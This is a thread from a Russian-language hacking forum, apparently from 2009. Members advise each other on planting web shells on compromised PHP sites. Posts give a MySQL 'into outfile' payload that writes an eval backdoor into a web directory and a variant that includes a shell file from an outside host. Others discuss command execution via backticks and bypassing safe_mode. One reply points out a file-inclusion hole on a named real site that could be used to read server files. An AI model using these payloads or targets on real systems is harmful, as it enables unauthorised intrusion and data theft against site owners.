ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6931  
Старый 03.05.2009, 01:03
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Qwazar, я про удалённый инклуд и не говорил)
Цитата:
а вообще лучше залить гифку с полноценным шеллом
так как он в админке пшпбб, то там наверника есть способ залить картинку
 
Ответить с цитированием

  #6932  
Старый 03.05.2009, 02:57
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

а ещё лучше echo =)

echo `ls -la`; - с косыми кавычками выполняет ту же функцию, что и пасстру ;-)
 
Ответить с цитированием

  #6933  
Старый 03.05.2009, 03:06
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Цитата:
Сообщение от o3,14um  
а ещё лучше echo =)

echo `ls -la`; - с косыми кавычками выполняет ту же функцию, что и пасстру ;-)
Ничем не лучше, для того, чтобы это работало, должна быть включена функция shell_exec, а она не пашет при сейф моде. В отличии от eval.

P.S.
И работает она не как passthru(), а как shell_exec().
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

Последний раз редактировалось Qwazar; 03.05.2009 в 03:10..
 
Ответить с цитированием

  #6934  
Старый 03.05.2009, 04:04
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Заранее извиняюсь,что не прочитал всю тему,но нельзя ли выполнить phpinfo() для просмотра safe_mode = On

Если РНР запущен в виде CGI модуля, то safe mode полюбому отсутствует.Также при юзании include,fopen(),file() и других функций safe mode даст о себе знать.Можно попробовать позапускать сценарии в различных каталогах(функциями system(),exec(),popen(),если они работают). Опять же будет попытка ругани со стороны сервера на то,что ты откроешь чужой фаил.Значит,опять сейф мод стоит.То бишь сразу будет ясно,что стоит директива safe_mode_exec_dir.Ещё можно попробовать создавать файлы с помощью php функций в других каталогах.Если будет ругаться - опять safe mode.Вообще,при safe mode,будут введены ограничения на следующие функции:

chgrp include require
chmod link rmdir
chown passthru symlink
exec popen system
fopen readfile unlink
file rename

Если со всеми ними будет неладно,то 100% стоит safe mode.Пробуй)
 
Ответить с цитированием

  #6935  
Старый 03.05.2009, 18:37
gromoza
Новичок
Регистрация: 21.12.2008
Сообщений: 24
Провел на форуме:
485675

Репутация: 10
По умолчанию

Цитата:
select '<? eval(stripslashes($_GET[phpinfo])); ?>' from dle_files into outfile 'C:/Program Files/VertrigoServ/www/engine/inc/check.php'
Как при имеющимся доступе в PMA залить нормальный шелл, а не это.
 
Ответить с цитированием

  #6936  
Старый 03.05.2009, 20:47
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
select '<? include("http://bestquest.info/shell.txt") ?>' into outfile 'C:/Program Files/VertrigoServ/www/engine/inc/check.php'
 
Ответить с цитированием

  #6937  
Старый 03.05.2009, 23:50
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686

Репутация: -25
Отправить сообщение для geforce с помощью ICQ
По умолчанию

Вопрос:[U]

http://wow.alania.net/?page=guilds&id=-7'

Это инъекция???
 
Ответить с цитированием

  #6938  
Старый 03.05.2009, 23:53
[x59]ReV
Banned
Регистрация: 03.05.2009
Сообщений: 8
Провел на форуме:
17814

Репутация: -59
По умолчанию

geforce нет
но тут
http://wow.alania.net/?page=
инклуд.
 
Ответить с цитированием

  #6939  
Старый 04.05.2009, 00:03
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686

Репутация: -25
Отправить сообщение для geforce с помощью ICQ
Question

Цитата:
Сообщение от [x59]ReV  
geforce нет
но тут
http://wow.alania.net/?page=
инклуд.
Это значит я туда могу shell загрузить?
 
Ответить с цитированием

  #6940  
Старый 04.05.2009, 00:18
[x59]ReV
Banned
Регистрация: 03.05.2009
Сообщений: 8
Провел на форуме:
17814

Репутация: -59
По умолчанию

geforce
Локальный инклуд... через него ты можеш прочитать любой фаил на серваке.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT.XYZ